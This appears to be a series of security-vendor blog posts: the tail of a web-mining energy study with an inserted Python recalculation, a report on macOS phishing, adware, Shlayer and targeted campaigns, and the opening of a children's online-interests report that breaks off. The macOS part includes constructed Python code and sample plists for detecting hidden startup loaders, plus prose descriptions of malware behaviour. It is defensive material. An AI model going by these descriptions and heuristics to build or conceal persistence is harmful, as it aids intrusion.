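To make the arithmetic behind these figures reproducible, here is an added worked example (not part of the article) that carries the formula W_total = <w>·N·t through with the published values: <w> = 40±25 W, N = 470 million blocked attempts, t between 46 seconds (the SimilarWeb visit time) and 5.3 minutes (the FORTH estimate), 67 TWh per year for Bitcoin, and the IEA figure of 475 kg CO2/MWh. The retail price used in the last line is a constructed illustration, not a figure from the article.

```python
# Added worked example (not from the article): the energy-saving estimate
# W_total = <w> * N * t carried through with the article's own values.

W_MEAN_WATTS = 40.0          # <w>: average extra draw of a device while web mining
W_ERR_WATTS = 25.0           # coarse uncertainty covering TDPs from 15 to 65 W
N_BLOCKED = 470_000_000      # blocked web-mining attempts in 2018 (KSN)
T_MIN_SECONDS = 46.0         # average visit to a CoinHive mirror (SimilarWeb)
T_MAX_SECONDS = 5.3 * 60     # average web miner working time (FORTH), 318 s
BITCOIN_TWH_PER_YEAR = 67.0  # estimated annual energy use of Bitcoin mining
CO2_KG_PER_MWH = 475.0       # IEA global average carbon intensity

JOULES_PER_MWH = 3.6e9
HOURS_PER_YEAR = 365 * 24


def detection_power_gw(w_watts=W_MEAN_WATTS, w_err=W_ERR_WATTS, n=N_BLOCKED):
    """Return (<w>*N, its uncertainty) in gigawatts.

    N is treated as exact, so the absolute error of the product is simply
    the error of <w> multiplied by N.
    """
    return w_watts * n / 1e9, w_err * n / 1e9


def energy_mwh(t_seconds, w_watts=W_MEAN_WATTS, n=N_BLOCKED):
    """W_total = <w> * N * t, converted from joules to megawatt hours."""
    return w_watts * n * t_seconds / JOULES_PER_MWH


def energy_range_mwh(t_lo=T_MIN_SECONDS, t_hi=T_MAX_SECONDS):
    """Lower and upper bounds of W_total for the two published time estimates."""
    return energy_mwh(t_lo), energy_mwh(t_hi)


def co2_tons(mwh, intensity=CO2_KG_PER_MWH):
    """Avoided emissions in metric tons for a given amount of energy."""
    return mwh * intensity / 1000.0


def bitcoin_avg_power_gw(twh_per_year=BITCOIN_TWH_PER_YEAR):
    """Average power draw of Bitcoin mining: annual energy divided by a year."""
    return twh_per_year * 1e12 / HOURS_PER_YEAR / 1e9  # TWh -> Wh, per hour -> W, -> GW


def cost(mwh, price_per_kwh):
    """Retail cost of the energy at a given price per kWh (currency-agnostic)."""
    return mwh * 1000.0 * price_per_kwh


if __name__ == "__main__":
    power, err = detection_power_gw()
    lo, hi = energy_range_mwh()
    print(f"detection power: {power:.1f} +/- {err:.1f} GW")
    print(f"energy saved: {lo:.0f} to {hi:.0f} MWh")
    print(f"CO2 avoided: {co2_tons(lo):.0f} to {co2_tons(hi):.0f} t")
    btc = bitcoin_avg_power_gw()
    print(f"Bitcoin average power: {btc:.3f} GW ({power / btc:.1f}x lower than detection power)")
    # Illustrative retail price (constructed, not from the article).
    print(f"cost of the upper bound at 0.15 per kWh: {cost(hi, 0.15):,.0f}")
```

Running it gives a detection power of 18.8±11.8 GW, an energy range of roughly 240 to 1,660 MWh (the article rounds the upper end to 1,670), and a Bitcoin average of about 7.65 GW. Note that the detection power carries an uncertainty of more than 60% purely from the spread of TDPs; the time estimate then stretches the interval by a further factor of seven, which is why the "detection power" is the more robust number to quote.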


The ongoing fight against web mining has been quite successful, in both legal and technological aspects. However, as long as profit can be made, cyber criminals will find ways to utilize the CPUs of unsuspecting victims. For instance, we had no trouble finding the above-mentioned CoinHive mirror, and it is not unlikely that the owners of CoinHive and other web mining sites will continue their assaults on unsuspecting users in the future as well, on systems without information security solutions, of course.

The most effective constraint, in our view, is the situation on the cryptocurrency market as a whole: web miners will continue to exist as a threat as long as it remains possible to convert cryptoassets mined this way into fiat currency.

Which means that in order to make our foreseeable future greener, literally, security products would have to continue working for the good of their owners — and the entire world.

  1. We have been able to experimentally measure the dependence of the increase in power consumption on nominal TDP for 21 types of processors, which amounts to 0.8% of the total number of processor types in the random 1% sample of CPUs in Kaspersky Security Network (2,497 processor types). Given that, and also assuming that the list of CPU types evolves over time, we plan to study this matter in more detail going forward.
  2. The estimates above were made on the assumption that the frequency distribution of TDPs for the CPUs that blocked web mining attempts was similar to the frequency distribution of CPU TDPs determined from a random sample of approximately 1% of the total number of devices participating in Kaspersky Security Network. This assumption may be incorrect, but there is no technical way of checking it, because Kaspersky Security Network operates only with depersonalized statistics, so we cannot match data on processor types with data on detections.

11 September 2019

Threats to macOS users


The belief that there are no threats for the macOS operating system (or at least no serious threats) has been bandied about for decades. The owners of MacBooks and iMacs are rivaled only by Linux users in terms of their confidence in their own security, and we must admit that they are right to a certain degree: compared to Windows-based systems, there are far fewer threats that target macOS. However, the main reason for this is the number of potential victims: there are many more computers running Windows than macOS. The situation is changing, though, since the popularity of the latter platform is growing. Due to this, and despite all the efforts Apple has taken, the threat landscape for Apple devices is changing, and the amount of malicious and unwanted software is growing.

For the purposes of this report we used the statistics from Kaspersky Security Network cloud infrastructure. It stores information about all of the malicious programs and other threats that our macOS product users agreed to anonymously share with us. In fact, all these threats at some point attacked the computers of Kaspersky security solution users, but these attacks were successfully repelled.

Figures and trends

Phishing

  • During the first half of 2019, we detected nearly 6 million phishing attacks on macOS users. Of these, 11.80% targeted corporate users.
  • The countries with the largest share of unique macOS users who experienced phishing attacks were Brazil (30.87%), India (22.08%), and France (22.02%).
  • The number of phishing attacks that make use of the Apple brand name grows by 30–40% every year. In 2018, the number of such attacks approached 1.5 million. As of June, the number of phishing attacks in 2019 has already exceeded 1.6 million, which is an increase of 9% over the entire previous year.

Malicious and potentially unwanted software

  • From 2012 to 2017, the number of macOS users who have experienced attacks from malicious and potentially unwanted programs grew, approaching 255,000 attacked users per year. However, starting in 2018, the number of attacked users began to decrease, and in the first half of 2019 it only amounted to 87,000.
  • The number of attacks on macOS users through malicious and potentially unwanted programs has been increasing annually since 2012, and in 2018 it exceeded 4 million attacks. During the first half of 2019, we registered 1.8 million attacks of this kind.
  • The vast majority of threats for macOS in 2019 were in the AdWare category. As for the malware threats, the Shlayer family, which masquerades as Adobe Flash Player or an update for it, has been the most prevalent.
  • More than a quarter of Mac users who are protected by Kaspersky solutions and have experienced malicious and potentially unwanted software attacks live in the USA.

Phishing for Mac users

We started collecting detailed statistics on phishing threats that target macOS users in 2015. The data that has been collected over the last four years suggests that the number of phishing attacks on macOS users is definitely growing, and quite rapidly at that. While in 2015 we registered a total of 852,293 attacks, in 2016 this figure grew by 86% to over 1.5 million, and in 2017 it skyrocketed to 4 million. In 2018, the number of attacks continued to grow, crossing the 7.3 million mark. At this point we can see that during the first half of 2019 alone, 5,932,195 attacks were committed, which means that the number of attacks may exceed 16 million by the end of the year if the current trend continues.

Growth in the number of phishing attacks on macOS users, 2015–2019

The share of corporate macOS users who faced phishing attacks during the first half of 2019 came up to 11.80%. This is a slight increase compared to the same period in 2018, when this category made up 10.25%.

The phishing page subject matters

In order to understand what services phishing pages impersonate, we analyzed the most common phishing tricks and the geography of attacked users. Then we compared the results with the data from the same period of 2018.

Both in 2019 and 2018, the phishing pages visited by macOS users most often pretended to be banking services (39.95% in 2019 and 29.68% in 2018), the second most popular category being global Internet portals (21.31% in 2019 and 27.04% in 2018). Social networks came in third in 2019 (12.3%), taking the place of online stores (10.75% in 2018).

H1 2018                                   H1 2019
Banks                          29.68%     Banks                          39.95%
Global Internet portals        27.04%     Global Internet portals        21.31%
Online stores                  10.75%     Social networks                12.30%
Payment systems                 6.63%     Payment systems                 8.40%
Telecommunications companies    5.22%     Online stores                   8.24%
Social networks                 5.06%     Web services                    4.70%
Financial services              4.87%     Telecommunications companies    2.06%
Web services                    4.16%     IT companies                    0.49%
Messengers                      1.19%     Online games                    0.44%
Online games                    1.06%     Financial services              0.35%
Other                           4.35%     Other                           1.76%

Phishing pages by share of users, first halves of 2018 and 2019


The countries with the largest share of unique macOS product users facing phishing attacks during the first half of 2019 were Brazil (30.87%), India (22.09%), and France (22.02%). In 2018, the top three countries were the same as in 2019. The only difference was in the percentages of users who were attacked: Kaspersky solutions prevented attacks against one out of four Mac product users in Brazil (26.02%), against one out of five in France (20.86%) and 17.70% in India.

H1 2018                                   H1 2019
Country          % of attacked users      Country          % of attacked users
Brazil           26.02%                   Brazil           30.87%
France           20.86%                   India            22.09%
India            17.70%                   France           22.02%
Spain            17.40%                   Spain            22.01%
Hong Kong        15.65%                   Australia        20.08%
Australia        15.14%                   Mexico           19.89%
Great Britain    14.43%                   Italy            18.36%
Mexico           13.53%                   Great Britain    18.11%
Canada           13.49%                   Canada           18.06%
Italy            13.11%                   Russia           17.25%

Geography of phishing attacks by share of users, first halves of 2018 and 2019

Spam and phishing attacks that impersonate Apple

Among the phishing attacks faced by macOS users we would separately focus on fake web pages that mimic Apple’s official pages or simply mention the brand. Not so long ago, in 2016, there were relatively few attacks (755,000) that tried to take advantage of the brand. But in 2017 they had grown by almost 40% to exceed 1 million, and a year later they almost reached 1.5 million. We have every reason to believe that a new record will be set in 2019: during the first half of the year alone, our solutions prevented more than 1.6 million attacks, which means that by the end of the year we can expect at least twofold growth.

Number of phishing attacks using the Apple brand, 2016–2019

Let’s take a closer look at some examples of phishing pages that mimic the official Apple website. Naturally, most commonly these phishing attacks aim to steal users’ Apple IDs.

Examples of phishing pages that are designed to steal AppleIDs

Links to these sites are usually sent in emails that allegedly come from Apple Support. The recipient is threatened that their account will be locked unless they click the link and log in to confirm the information that has been specified in their profile.

Examples of phishing emails that have been sent to steal an AppleID

Another phishing trick is thank you messages for purchasing an Apple device or app on the App Store. The “client” is invited to learn more about the product (or cancel the purchase) by clicking a link that leads to a phishing page. Here, the victim is required to enter their Apple ID login and password, which, of course, will be sent to the attackers.

Fake malware attacks

Another variation on phishing web pages is malware infection detection notification pages. The design for these notifications varies. Some of them are very high quality, and they faithfully copy the design of the official Apple website. The threat of a malware infection is supposed to convince the user to call a fake support number or install a fake antivirus application that will turn a non-existent threat into a real one.

Example phishing page that provides a notification of a nonexistent infection

Malicious and unwanted programs for macOS

At the time of writing, our database contained 206,759 unique malicious and potentially unwanted files for macOS. The diagram below illustrates the growth of our database, i.e., the number of abovementioned files that were added to the database in a given year.

The number of malicious and potentially unwanted files for macOS, 2004–2019

As you can see from the diagram, up to 2011 the number of malicious files targeting macOS that were detected each year was insignificant. But then the situation changed: starting in 2012, the number of files we collected began to double year over year. However, during the first half of 2019, only 38,677 malicious and potentially unwanted objects were detected, which means that we do not expect to see a similar increase this year over 2018.

In order to identify the changes in the number of macOS users who were attacked by malware in recent years, we examined our statistics from 2012 (the time when data was first systematized) to the present. Much like in the diagram above, you can see a sharp increase in the number of users who were attacked between 2012 and 2017.

Number of unique macOS users attacked by malware, 2012 to June 2019

In order to roughly estimate how often macOS users are attacked by both malicious and unwanted software, we can look at the diagram that illustrates the number of times that Kaspersky products have detected either of the threats.

Number of times that Kaspersky products detected malware and potentially unwanted software for macOS, 2012 to June 2019

This diagram clearly shows an increase in the number of attacks that occurred in 2018. At the same time, the data for 2019 (1,820,578 attacks over the first 5 months) suggests that this year the number of attacks will decline.

Geography of attacks

In order to get an idea of the geographical distribution of threats for macOS and to determine if there are regions where users are more likely to be attacked by malicious software nowadays, we compiled a rating of countries by the share of unique users attacked in the first half of 2019, and, for the sake of comparison, in the first half of 2018.

     H1 2018                                  H1 2019
#    Country          % of attacked users*    Country          % of attacked users*
1    USA              29.2%                   USA              24.4%
2    Germany          11.9%                   Germany          14.6%
3    France            8.3%                   France           12.4%
4    Great Britain     7.3%                   Great Britain     6.8%
5    Canada            4.7%                   Spain             5.1%
6    Russia            4.3%                   Japan             4.7%
7    Spain             3.8%                   Russia            4.6%
8    Italy             2.8%                   Canada            4.1%
9    Japan             2.7%                   Italy             4.0%
10   Brazil            2.5%                   Brazil            2.9%

* Attacked users of Kaspersky products for macOS in the country as a share of all attacked users of these products

The top three countries remained the same between 2018 and 2019: the United States came in first place (24.4%), Germany came in second (14.6%), and France came in third (12.4%).

2019 threats

Here are the TOP 10 threats for macOS that we have observed during the first half of 2019:

Verdict                                        %*
HEUR:Trojan-Downloader.OSX.Shlayer.a           21.74%
not-a-virus:HEUR:AdWare.OSX.Bnodlero.q         16.34%
not-a-virus:HEUR:AdWare.OSX.Spc.a              12.75%
not-a-virus:HEUR:AdWare.OSX.Geonei.as          10.24%
not-a-virus:AdWare.OSX.Geonei.ap               10.24%
not-a-virus:HEUR:AdWare.OSX.Pirrit.j            7.78%
not-a-virus:HEUR:AdWare.OSX.Pirrit.p            7.60%
not-a-virus:AdWare.OSX.Agent.b                  6.17%
not-a-virus:HEUR:AdWare.OSX.Pirrit.o            6.00%
not-a-virus:HEUR:AdWare.OSX.MacSearch.a         5.82%

* The share of unique users attacked by this malware out of all users of Kaspersky security solutions for macOS who have been attacked

With the exception of the Shlayer trojan that came in first place (more about that a little later), the rest of the top ten is filled out by various unwanted software belonging to the AdWare class. The objective of these programs, as you might guess from the name, is to display ads wherever possible: in system notifications, web page banners, search results pages, the browser, etc. This does not actively harm the user, but it definitely does not add a positive spin to using your computer.

Example of malware installed or advertised to users by some types of AdWare

Let us proceed from a general description to specific examples. The AdWare.OSX.Bnodlero family prefers to work with the browser: this software installs ad extensions, and changes the default search engine and homepage. In addition, it can download and install extra adware.

Some samples in the AdWare.OSX.Pirrit family go even further and install a proxy server on the victim’s machine to intercept traffic from the browser. There is another family that is closely connected with this one, Agent.b, since it is precisely this unwanted software that frequently downloads Pirrit. When it is not busy downloading, unpacking, and launching files, Agent.b injects JS code with advertising into the web pages that are viewed by the victim.

We would also like to mention the AdWare.OSX.Cimpli family. At first glance it is no different from other adware. However, its samples behave more cunningly and deliberately become inactive if they detect an installed security solution in macOS.

When they detect these types of applications, AdWare.OSX.Cimpli family samples prefer to stay inactive

We assume that this feature was added to Cimpli in order to protect it from being listed in the databases of security software developers and, as a result, from being blocked. However, if there is a chance that the user will delete the program, then the malware will wake up and start working.

The Trojan-Downloader.OSX.Shlayer family, which heads our top ten ranking, downloads and installs various AdWare, mainly from the Bnodlero family (and this is one of the reasons why Bnodlero ranks second).

Why do we detect this particular family so often? It all has to do with how widely it is distributed: if you try to search for sites where you can watch or download a popular movie or TV series for free, the very first search results will lead to resources that request you to update Flash Player in order to view content. It is these updates that contain Shlayer.

Link to a site with Shlayer on the first search results page

Note that this technique of pushing a link to a malicious page up in the search results for certain queries is also used by distributors of other malware. Not so long ago, we studied the threats that target Game of Thrones and other popular TV series fans who wanted to download new and not yet released episodes or watch them online.

One of the websites encouraging users to download malware under the pretext of updating Flash Player

It is worth noting that from a technical point of view, Shlayer is nothing special. Its main executable file is a Bash script that consists of only four lines of code. All it does is decrypt and run another file that it brings along with it, which in turn downloads, decrypts, and executes another file, which does exactly the same. In the end, this nesting doll of malware installs several AdWare programs, hides them well, and registers them to run at startup.

The main executable file of the Shlayer Trojan is just the outer layer of a nesting doll
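The report notes that the final layer of the Shlayer chain hides the installed adware and registers it to run at startup. On macOS, "run at startup" normally means a launchd property list in a LaunchAgents or LaunchDaemons folder, so one defender-side check is to audit those plists for hidden or temporary program paths. The following is an added example, not code from the report; its heuristics and sample plists are constructed for illustration and are not derived from real Shlayer samples.

```python
"""Audit macOS launchd plists for startup entries that look like hidden loaders.

Added example, not code from the Kaspersky report. The report says the Shlayer
chain ends by installing several AdWare programs, hiding them and registering
them to run at startup; on macOS that normally means a property list under a
LaunchAgents/LaunchDaemons folder, which a defender can audit. Heuristics and
sample plists are constructed for illustration, not taken from real samples.
"""
import plistlib
from typing import Dict, List

INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")

# Constructed sample plists keyed by path: one benign updater, two loader-like.
SAMPLE_PLISTS: Dict[str, bytes] = {
    "/Library/LaunchAgents/com.example.updater.plist": b"""<?xml version="1.0"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>Program</key><string>/Applications/Example.app/Contents/MacOS/updater</string>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "/Users/demo/Library/LaunchAgents/com.sample.loader.plist": b"""<?xml version="1.0"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.sample.loader</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>/Users/demo/Library/.hidden/loader.sh</string>
  </array>
  <key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>""",
    "/Library/LaunchDaemons/com.sample.tmp.plist": b"""<?xml version="1.0"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.sample.tmp</string>
  <key>Program</key><string>/private/tmp/.x/helper</string>
</dict></plist>""",
}


def launched_paths(plist: dict) -> List[str]:
    """Program launchd starts plus further arguments (Program wins over ProgramArguments[0])."""
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    if "Program" in plist:
        return [str(plist["Program"])] + args[1:]
    return args


def suspicious_reasons(plist: dict) -> List[str]:
    """Heuristic checks on one parsed plist; an empty list means nothing flagged."""
    paths = launched_paths(plist)
    reasons: List[str] = []
    if any(part.startswith(".") and part not in (".", "..")
           for p in paths for part in p.split("/")):
        reasons.append("hidden dot-directory in program path or arguments")
    if any(p.startswith(TEMP_PREFIXES) for p in paths):
        reasons.append("program or script in temporary directory")
    if paths and paths[0].rsplit("/", 1)[-1] in INTERPRETERS and len(paths) > 1:
        reasons.append("interpreter launched with a script argument")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad combined with KeepAlive (respawns if killed)")
    return reasons


def audit_plists(plists: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Parse each plist (path -> raw bytes); return only flagged paths with reasons."""
    findings: Dict[str, List[str]] = {}
    for path, raw in plists.items():
        try:
            data = plistlib.loads(raw)
        except Exception as exc:  # a malformed plist is itself worth a look
            findings[path] = [f"unparseable plist: {exc.__class__.__name__}"]
            continue
        reasons = suspicious_reasons(data)
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in audit_plists(SAMPLE_PLISTS).items():
        print(path, "->", "; ".join(reasons))
```

On a live system the same functions can be fed the raw bytes of every plist under /Library/LaunchAgents, /Library/LaunchDaemons and ~/Library/LaunchAgents.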

Two other malware families that we encountered during the first half of the year are Trojan.OSX.Spynion and Trojan-Downloader.OSX.Vidsler. Both are far less widespread than Shlayer, having been encountered by fewer than one percent of our users. However, each of them uses its own method of deceiving a potential victim, and both deserve attention.

The Trojan.OSX.Spynion trojan is distributed along with several free macOS apps, mainly from sites such as MacUpdate, VersionTracker, and Softpedia. While the app is being installed on the victim’s computer, a malicious component is downloaded and installed. Spynion’s main objective is to monitor user activity on the network and transfer intercepted confidential data to the attackers’ servers. The trojan also has backdoor functionality, i.e., it allows attackers to remotely connect to the user’s macOS.

Trojan-Downloader.OSX.Vidsler is distributed via banner ad links, only this time under the pretext of requiring the user to update video codecs or download a new version of a video player. In terms of functionality, Vidsler is similar to Shlayer: it downloads, installs, and runs other software, most often from the FkCodec AdWare family.

Lastly, we should point out several rather dangerous trojans, which, fortunately, are not encountered very frequently in the wild. For example, the Trojan-Ransom.OSX.KeRanger family ransomware trojans encrypt all of the user’s files on the drive and demand a ransom to decrypt them. This malware is known to have been distributed through the official website of the Transmission torrent client. Another example is the Trojan-Spy.OSX.Ventir trojan, which has a complex modular architecture and contains not only a backdoor to remotely access the victim’s macOS, but also a keylogger.

MacOS and targeted attacks

Our statistics concerning threats for macOS provide fairly convincing evidence that the stories about this operating system’s complete safety are nothing more than that. However, the biggest argument against the idea that macOS (and iOS as well) is invulnerable to attack is the fact that there already have been attacks against individual users of these operating systems and groups of such users. Over the past few years, we have seen at least eight campaigns whose organizers acted on the presumption that the users of MacBook, iPhone, and other devices do not expect to encounter malware created specifically for Apple platforms.

Due to the nature of Apple’s antivirus software policy, the Kaspersky product line does not contain a security solution for iOS. As a result, we do not have statistics about threats to this operating system. However, along with malware for Android, Kaspersky researchers have also encountered malicious implants for iOS.

Next, we will provide an overview of what we consider to be the most interesting targeted attacks against the macOS and iOS platforms that we have been investigating over 2018 and 2019.

The Skygofree implant for iOS (January 2018)

Soon after the discovery of the Skygofree Android implant, Kaspersky experts found and analyzed an implant for iOS that had been developed by the same group of cybercriminals. It was discovered as a result of the analysis of the Skygofree infrastructure and consisted of several configuration files (MobileConfig) for iOS, which were used to register the device on an MDM server.

Sofacy XAgent (March 2018)

Kaspersky experts closely follow the activity of Sofacy, one of the most professional of cyber espionage groups. One of the tools at the disposal of this group is XAgent, which is a set of malware sharing a common code base, each sample individually modified to infect a specific OS, including macOS and iOS. However, the most recent detected versions of this malware for iOS date back to the end of 2014 and the beginning of 2015. This may mean that cybercriminals have (at least temporarily) lost interest in iPhones and iPads.

Bahamut-related implants for iOS and Windows (July 2018)

While studying the Skygofree iOS implant, our experts attempted to find other malware campaigns that used the results of a study of Apple’s MDM system conducted by the Intrepidus Group to compromise iOS devices. As a result, several servers were discovered that presumably belong to the Bahamut group and have been active since 2017.

Operation AppleJeus (August 2018)

While investigating an attack on a cryptocurrency exchange service conducted by the Lazarus group, we discovered that the attackers sent out messages to potential victims with a link to a malicious macOS cryptocurrency trading app.

ThreatNeedle and Manuscrypt (October 2018)

In 2018, we also discovered that Manuscrypt, a piece of malware used exclusively by the Lazarus group, was engaged in suspicious activity. The new samples of this malware were noticeably different from those exposed during previous campaigns, so we gave them a new name: ThreatNeedle.

Windtail (December 2018)

Shortly after Dark Matter published its findings about the Windshift group in August 2018, we conducted our own investigation on the activities of this group. In particular, we were interested in a piece of macOS malware called Windtail.

New macOS malware from Lazarus (January 2019)

Six months after the AppleJeus operation, we discovered a new Lazarus campaign with similar symptoms: again, companies from the financial sector were hit, and again previously unknown malware for macOS was used during the attack.

New iOS implant version from FinSpy (mid 2019)

At the end of 2018, we discovered a new version of the FinSpy iOS implant in the wild, which was apparently developed during the summer of that year. This implant was part of the FinSpy Mobile product that was provided by the well-known tracking software developer.


MacOS malware has come a long way from the isolated instances that existed in 2004 to the hundreds of thousands of types that exist in 2019. However, the era of explosive growth seems to be behind us, and we cannot but notice the decline in cybercriminal activity on this platform. That said, the owners of MacBooks and iMacs have never been considered priority targets compared to Windows users, as the latter have always been much more profitable to attack simply because they are far more numerous. In addition, there is a large number of both known and less well known exploits for Windows, which, combined with the fact that Windows users tend to install updates irregularly, makes it easier and more convenient for cybercriminals to infect Windows systems.

Another important aspect that we have discovered while preparing this report is that instead of full-fledged malware, MacBook and iMac owners increasingly receive annoying, but in most cases relatively harmless ads. It seems that this way of monetizing an infection allows attackers to make a profit and save on expenses. By contrast, it would be much more complicated and expensive to create full-fledged malware for macOS. The reasons for this are both the fact that there are fewer potential victims and the efforts that Apple is making to protect its customers.

Phishing and social engineering, which are now also on the rise, are another example of cheaper threats. The attackers continue to mainly target Apple IDs, which are the users’ key to gaining access to Apple’s infrastructure. Apple IDs are relatively easy to monetize. For example, they can be sold to other criminals. Perhaps the theft of this type of data is now the most dangerous threat macOS users face, in terms of the balance between the probability of the attack and the damage in the event of its success. Moreover, our statistics show that this type of attack is likely to be on the rise in the near future.

An extremely dangerous (but also extremely rare) threat is a targeted attack on macOS and iOS users, mainly business users. Several well-known cybercriminal groups are currently developing malware for these operating systems, but the likelihood that a random user will be the target of such programs is extremely small. However, if you work in a financial institution, such as a bank, and your MacBook or iPhone is a corporate device, then the chances that you will be targeted increase considerably. In this case the threat is significant enough that we do not recommend relying on the fact that Apple devices are in general less popular targets, and we recommend seeking out a reliable security solution. All the more so as we expect the number of targeted attacks on macOS and iOS devices to increase between 2019 and 2020.

To keep your macOS devices safe, Kaspersky recommends:
  • Try to keep macOS and all of your apps up to date
  • Use only legitimate software, downloaded from official webpages or installed from the Mac App Store
  • Start using a reliable security solution like Kaspersky Internet Security that delivers advanced protection on Mac, as well as on PC and mobile devices
  • Download and install apps only from official resources such as the App Store
  • If you need to access your iCloud, for instance to find your phone when it is lost, use only the official website

To reduce the risk for corporate macOS users, Kaspersky recommends that companies take the following measures:
  • Implement security awareness training for staff explaining how to recognize and avoid potentially malicious applications or files. For example, employees should not download and launch any apps or programs from untrusted or unknown sources.
  • Use a dedicated security product with protection for macOS and iOS included, such as Kaspersky Endpoint Security for Business. The product is empowered with cloud-based threat intelligence and machine learning techniques to detect existing and new threats on different operating systems.
  • Provide your SOC team with access to the latest Threat Intelligence, which covers threats for macOS, to keep up to date with the new and emerging tools, techniques and tactics used by threat actors.
September 9, 2019

This is what our summer’s like

For the second summer in a row, we look at children’s interests during the period when they have enough leisure to devote themselves fully to their hobbies. Modern children are active internet users, so most of their interests are reflected in their online activities, which are the subject of today’s review.

Statistics collection principles

Kaspersky Lab products scan the content of web pages children try to access. If the website belongs to one of the fourteen unwelcome categories, the Kaspersky Security Network is alerted (no private user data is sent, so privacy is not compromised). Note these two important points:

It is up to the parent to decide which content to block by adjusting the protective solution’s settings. However, anonymous statistics are collected for all 14 categories.

Data is harvested only from computers running Windows and macOS; no mobile statistics are provided in this report.

Website categorization

In the products featuring Parental Control functions, web filtering is currently performed across the following categories:

Search query filtering

Children’s search activities best illustrate their interests. Kaspersky Safe Kids is able to filter kids’ queries for five different search engines: Bing, Google, Mail.ru, Yahoo! and Yandex — across six potentially risky subjects: “Adult content”, “Alcohol”, “Drugs”, “Tobacco”, “Racism” and “Profanity”.

We have grouped search queries by language. We consider the English statistics to be international, because English is such a widespread language. We take as 100% the total number of search queries submitted by individual users in all languages across all subjects of interest to us, repetitions included. The percentage of queries shows how popular a subject is.

We have split the search queries we collected from June through August 2019 into several subject categories:

  • Anonymity online
  • Alcohol, tobacco, narcotics
  • News
  • Anime
  • Memes
  • Sports
  • Celebrities
  • Education
  • Music
  • Online communication
  • Translator
  • Porn and erotic
  • Shopping
  • Computer games
  • Video

Picture of the world

This summer, children didn’t change their habits much: just like one year ago they would spend time watching YouTube videos, TV series and movies, listening to music and chatting on social networks. Much of their time was dedicated to online store browsing.

News websites drew less attention than last summer, losing 4.63 percentage points down to 6.84%. The share of porn websites decreased somewhat as well (by 1.21 p.p.): this summer these accounted for a mere 1.06% of all visited resources. Alcohol, tobacco and drugs websites have almost completely left modern children’s sphere of interests, with a share of just 0.36%.

Interestingly, the “Computer games” category has lost ground, too: from 5.33% to 1.98%. This does not mean that children have stopped playing games — quite the opposite. As explained in our annual report, children have quickly developed a passion for mobile games and migrated to mobile platforms almost completely.


Parental Control module and Safe Kids product notifications across 14 categories, June — August 2019

If you look at how popular different search query subjects are, you will see that most of the time children would be looking for movies and TV series (21.93% of all queries analyzed), computer games info (18.97%), merchandise (12.91%), porn and erotic content (10.50%).

It is important to emphasize that search queries reflect exactly children’s interests, while website visits speak of how they spend time online. Thus, if we look at, say, the “Online communication” category, we shall see that it accounts for 30.41% of visits, but merely 7.20% of search queries. This is because Facebook gets listed among search queries by mistake: if you begin typing “face…” into the address bar, the browser will suggest the full URL (facebook.com), but if you ignore the suggested option, the text you type will turn into a query for the search engine.


User search queries by subject category, June — August 2019

Software, audio, video

We have observed more than once that children take interest in video and audio content and, more than anything else, like to visit YouTube and other streaming platforms to view gaming streams or listen to music.

YouTube vs movies vs animations

YouTube is one of the top choices for children. They use it to watch game walkthroughs, music videos, lifestyle video blogs and lots of other things.


User search queries in the “Video” category, June — August 2019

YouTube accounts for most video-related queries. Children are looking both for the service itself (“youtube” being the most popular search query, representing the same search pattern as “facebook”) and all sorts of bloggers.

This summer, other than the famous blogger PewDiePie, many kids were looking for the English-speaking beauty blogger James Charles (16,040,666 subscribers at the time of writing).

Coming up third is the professional Battle Royale player and streamer Ninja (Battle Royale is a game genre popular among children).

Speaking of movies, children’s top-ranking queries were about Spider-Man: Far From Home, Disney’s version of Aladdin and John Wick: Chapter 3, starring the extremely popular and meme-sparking (since 2010) Keanu Reeves.

As to TV series, children’s favorite this summer is Stranger Things, whose third season was released in early July. They were looking not just for the series itself, but also for information about the actors, who are the same age as many of our young users.

The second most popular one, based on search queries, is HBO’s Chernobyl miniseries. Interestingly, with the series so popular, children have begun to dig more into radiation and all things related. We have registered queries like “radioactive”, “radon”, “radiation”, which would never have made it even into TOP 10,000 before.


This summer’s most popular streaming service — and also the top search query among kids — is Spotify. Billie Eilish, whom we have already covered in our annual report, is second in terms of search query frequency. In third place is this summer’s hit Old Town Road by Lil Nas X. The track has seen lots of remixes, has 284,202,308 views on YouTube, and is used in over 2 million videos uploaded to TikTok.

Computer games

On 2 August, a press release came out claiming that the number of active Roblox players has exceeded 100 million, surpassing the number of Minecraft players (91 million). Interestingly, according to our statistics there are more queries about Minecraft. Moreover, by the same criterion Fortnite turned out to be more popular than Roblox, too. But this should not lead to conclusions about the time children spend on a particular game: search activity may reflect attempts to clarify some gameplay details or simply to find walkthroughs.



Speaking of the big game industry events that got children involved this summer, we should mention Keanu Reeves’ appearance at the year’s main gaming exhibition, E3: the actor appeared on stage during the announcement of one of next year’s most anticipated games, Cyberpunk 2077, and, as became clear from the game’s new trailer, was cast as one of the game’s NPCs. Incidentally, Reeves was one of children’s top celebrity search queries this summer.

Online stores and shopping

In our annual report, we mentioned children’s heightened interest in online shopping. According to search queries, kids have more time for online stores in the summer: the “Shopping” category’s annual share of 8.72% rose to 12.91% over the summer. As before, amazon, ebay and aliexpress were the most popular queries. The clothing brands children looked for most were Vans, Gucci, Zara, H&M, as well as today’s extremely popular Off-White and Balenciaga. In electronics, the top searches were Apple and Samsung.

Online communication

The short-video format is today’s global trend in social networking, and the TikTok network (which we covered extensively in our annual report) is fully aligned with it. The network has remained popular during the summer, even overtaking SnapChat in terms of the number of subject-related search queries.

And yet Facebook is still the most popular search query for online communication, followed by Instagram and Twitter, with TikTok, Pinterest and SnapChat bringing up the rear.

Porn and erotic

